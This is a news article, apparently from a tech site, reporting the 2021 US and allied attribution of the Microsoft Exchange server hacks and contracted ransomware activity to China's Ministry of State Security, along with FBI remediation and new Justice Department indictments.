LOGO

US Blames China for Exchange Server Hacks & Ransomware Attacks

July 19, 2021
Topics:attorney generalbidenBiden administrationChinacomputer securitycomputingcyberattackscybercrimeCyberwarfaredepartment of justicedojFederal Bureau of Investigationgovernmenthackerhackinghealthcareinternet securityMicrosoftNational Security AgencyNorwayrussiaSecurityswitzerlandtechnologyUnited KingdomUnited States
US Blames China for Exchange Server Hacks & Ransomware Attacks

China Accused of Large-Scale Microsoft Exchange Hack

The administration of President Biden, alongside its international partners, has officially charged China with orchestrating the extensive hacking of Microsoft Exchange servers earlier in the year. This development led to intervention by the FBI due to escalating concerns regarding potential widespread system damage.

Details of the Hacking Campaign

The hacking initiative targeted Microsoft Exchange email servers, exploiting four previously unknown security flaws. These vulnerabilities enabled hackers – identified by Microsoft as Hafnium, a group linked to China – to access email accounts and address books from a substantial number of organizations throughout the United States.

While Microsoft promptly released security updates to address these vulnerabilities, these patches did not eliminate any pre-existing malicious code left by the attackers. This remaining code could potentially be re-activated for future unauthorized access.

FBI Response and International Cooperation

Consequently, the FBI obtained an unprecedented court order authorizing them to access and remove the backdoor code from hundreds of affected Exchange servers within the U.S. Similarly, computer security teams globally worked to alert organizations in their respective countries that had been impacted by the cyberattack.

The Biden administration’s statement released on Monday indicated that the attack, attributed to hackers associated with China’s Ministry of State Security, resulted in “significant remediation costs for its mostly private sector victims.”

The statement further emphasized, “We have communicated our concerns regarding this incident and the [People’s Republic of China’s] wider pattern of harmful cyber activity to high-ranking PRC Government officials, making it clear that the PRC’s actions pose a threat to security, trust, and stability in cyberspace.”

NSA Support and Allied Backing

To aid network defenders, the National Security Agency also published detailed information about the attacks, outlining potential compromise pathways.

Several allies, including the United Kingdom and NATO member states, publicly supported the Biden administration’s conclusions. The U.K. government specifically identified Beijing as responsible for a “pervasive pattern” of hacking activities. The Chinese government continues to deny any involvement in state-sponsored hacking.

China's Alleged Ties to Criminal Hackers

The Biden administration also alleges that China’s Ministry of State Security has contracted with cybercriminals to carry out illicit operations, such as ransomware attacks, “for their own financial gain.” It is reported that these China-linked hackers have demanded millions of dollars in ransom from compromised companies.

Last year, the Justice Department indicted two Chinese intelligence officers for their involvement in a global hacking campaign, alleging they operated for personal enrichment.

While the U.S. has previously engaged with the Kremlin to discourage the provision of safe harbor for ransomware groups operating within Russia, this marks the first time Beijing has been directly accused of launching or participating in ransomware attacks.

“The PRC’s failure to address criminal activity conducted by contracted hackers inflicts harm on governments, businesses, and critical infrastructure, resulting in billions of dollars in losses due to stolen intellectual property, confidential data, ransom payments, and mitigation expenses,” the statement declared.

Additional Malicious Activities

The statement also detailed that the China-backed hackers engaged in extortion and cryptojacking, a practice involving the unauthorized use of a computer’s resources to mine cryptocurrency for profit.

New Indictments Announced

The Justice Department announced additional charges against four China-backed hackers affiliated with the Ministry of State Security. U.S. prosecutors allege these individuals were involved in attempts to steal intellectual property and research related to infectious diseases, including Ebola, HIV/AIDS, and MERS, from victims in the U.S., Norway, Switzerland, and the United Kingdom, utilizing a shell company to conceal their operations.

“The extensive scope and prolonged nature of China’s hacking campaigns, encompassing efforts targeting a dozen countries across diverse sectors – from healthcare and biomedical research to aviation and defense – serve as a reminder that no nation or industry is immune. Today’s international condemnation demonstrates a global desire for equitable rules, where countries prioritize innovation over theft,” stated Deputy Attorney General Lisa Monaco.

#China#US#Exchange Server#hacks#ransomware#cybersecurity

Related Posts

NHS England Data Breach Confirmed by Tech Provider

NHS England Data Breach Confirmed by Tech Provider

Cisco Zero-Day Exploit: Chinese Hackers Targeting Customers

Cisco Zero-Day Exploit: Chinese Hackers Targeting Customers

Pornhub Hacked: User Data Extorted by Hacking Group

Pornhub Hacked: User Data Extorted by Hacking Group

Google and Apple Release Emergency Security Updates

Google and Apple Release Emergency Security Updates

700credit Data Breach: 5.6 Million Affected

700credit Data Breach: 5.6 Million Affected

Home Depot Data Breach: Internal Systems Exposed for a Year

Home Depot Data Breach: Internal Systems Exposed for a Year